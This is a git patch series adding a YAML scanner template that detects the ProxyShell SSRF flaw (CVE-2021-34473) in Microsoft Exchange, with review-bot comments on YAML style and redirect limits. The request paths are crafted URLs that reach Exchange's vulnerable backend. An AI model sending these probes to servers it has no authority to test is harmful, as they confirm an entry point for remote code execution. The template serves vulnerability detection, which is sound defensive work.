From 99d41391e72aa8c9b51c47edb60dfeb1f015aa55 Mon Sep 17 00:00:00 2001
From: Paul Werther
Date: Tue, 10 Aug 2021 09:59:06 +0200
Subject: [PATCH 1/3] add ProxyShell detection template
---
 cves/2021/CVE-2021-34473.yaml | 23 +++++++++++++++++++++++
 1 file changed, 23 insertions(+)
 create mode 100644 cves/2021/CVE-2021-34473.yaml
diff --git a/cves/2021/CVE-2021-34473.yaml b/cves/2021/CVE-2021-34473.yaml
new file mode 100644
index 0000000000..8f5ed21b88
--- /dev/null
+++ b/cves/2021/CVE-2021-34473.yaml
@@ -0,0 +1,23 @@
+id: CVE-2021-34473
+
+info:
+  name: Exchange Server SSRF (ProxyShell)
+  author: arcc
+  severity: critical
+  description: |
+    Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206.
+  reference: |
+    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473
+    - https://www.youtube.com/watch?v=FC6iHw258RI
+    - https://portswigger.net/daily-swig/a-whole-new-attack-surface-researcher-orange-tsai-documents-proxylogon-exploits-against-microsoft-exchange-server
+  tags: cve,cve2021,ssrf,rce,exchange
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com"
+
+    matchers:
+      - type: status
+        status:
+          - 302
\ No newline at end of file
From ff558bd94edafedd7043ab42906c6035be3aa757 Mon Sep 17 00:00:00 2001
From: Paul Werther
Date: Tue, 10 Aug 2021 10:17:37 +0200
Subject: [PATCH 2/3] add second url for more stable detection
---
 cves/2021/CVE-2021-34473.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/cves/2021/CVE-2021-34473.yaml b/cves/2021/CVE-2021-34473.yaml
index 8f5ed21b88..c7bc47bedc 100644
--- a/cves/2021/CVE-2021-34473.yaml
+++ b/cves/2021/CVE-2021-34473.yaml
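Review bot: `reference: |` turns the three URLs into one literal string whose lines merely begin with `- `, not a YAML sequence, so a consumer that reads `reference` as a list receives a single multi-line blob; drop the `|` and put the entries as list items directly under `reference:`. The `description: |` text also runs two sentences together (`Vulnerability This CVE ID`), and `|` keeps a trailing newline on the value; `description: |-` with a period after `Vulnerability` reads better. The file is committed without a final newline, which the later patches carry forward.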
@@ -15,7 +15,8 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com"
+      - '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com'
+      - '{{BaseURL}}/mapi/nspi/?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com'
 
     matchers:
       - type: status
From 36e43b66ec0e438afa56ec4638e7e06d2491b118 Mon Sep 17 00:00:00 2001
From: Paul Werther
Date: Tue, 10 Aug 2021 10:53:58 +0200
Subject: [PATCH 3/3] follow redirect, compare body instead of status code, eliminate false positives
---
 cves/2021/CVE-2021-34473.yaml | 11 +++++++----
 1 file changed, 7 insertions(+), 4 deletions(-)
diff --git a/cves/2021/CVE-2021-34473.yaml b/cves/2021/CVE-2021-34473.yaml
index c7bc47bedc..d68b694bb0 100644
--- a/cves/2021/CVE-2021-34473.yaml
+++ b/cves/2021/CVE-2021-34473.yaml
@@ -14,11 +14,14 @@ info:
 
 requests:
   - method: GET
+    redirects: true
     path:
       - '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com'
-      - '{{BaseURL}}/mapi/nspi/?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com'
+      - '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com'
 
     matchers:
-      - type: status
-        status:
-          - 302
\ No newline at end of file
+      - type: word
+        part: body
+        words:
+          - Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException
+          - Exchange MAPI/HTTP Connectivity Endpoint
\ No newline at end of file
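Review bot: The added `redirects: true` in patch 3 is unbounded, so the engine's default redirect cap applies and every `Location` the probed host returns — including one pointing off-host — is followed during an SSRF check; the redirect the commit message relies on is a single hop, so pair it with `max-redirects: 2` on the line below. The `word` matcher leaves its combining rule implicit; an explicit `condition: or` under `words:` documents that either body string on either path is a positive. Since both paths are always sent, `stop-at-first-match: true` on the request would avoid the second probe once the first matches; the `requests:` block is fully visible in this hunk.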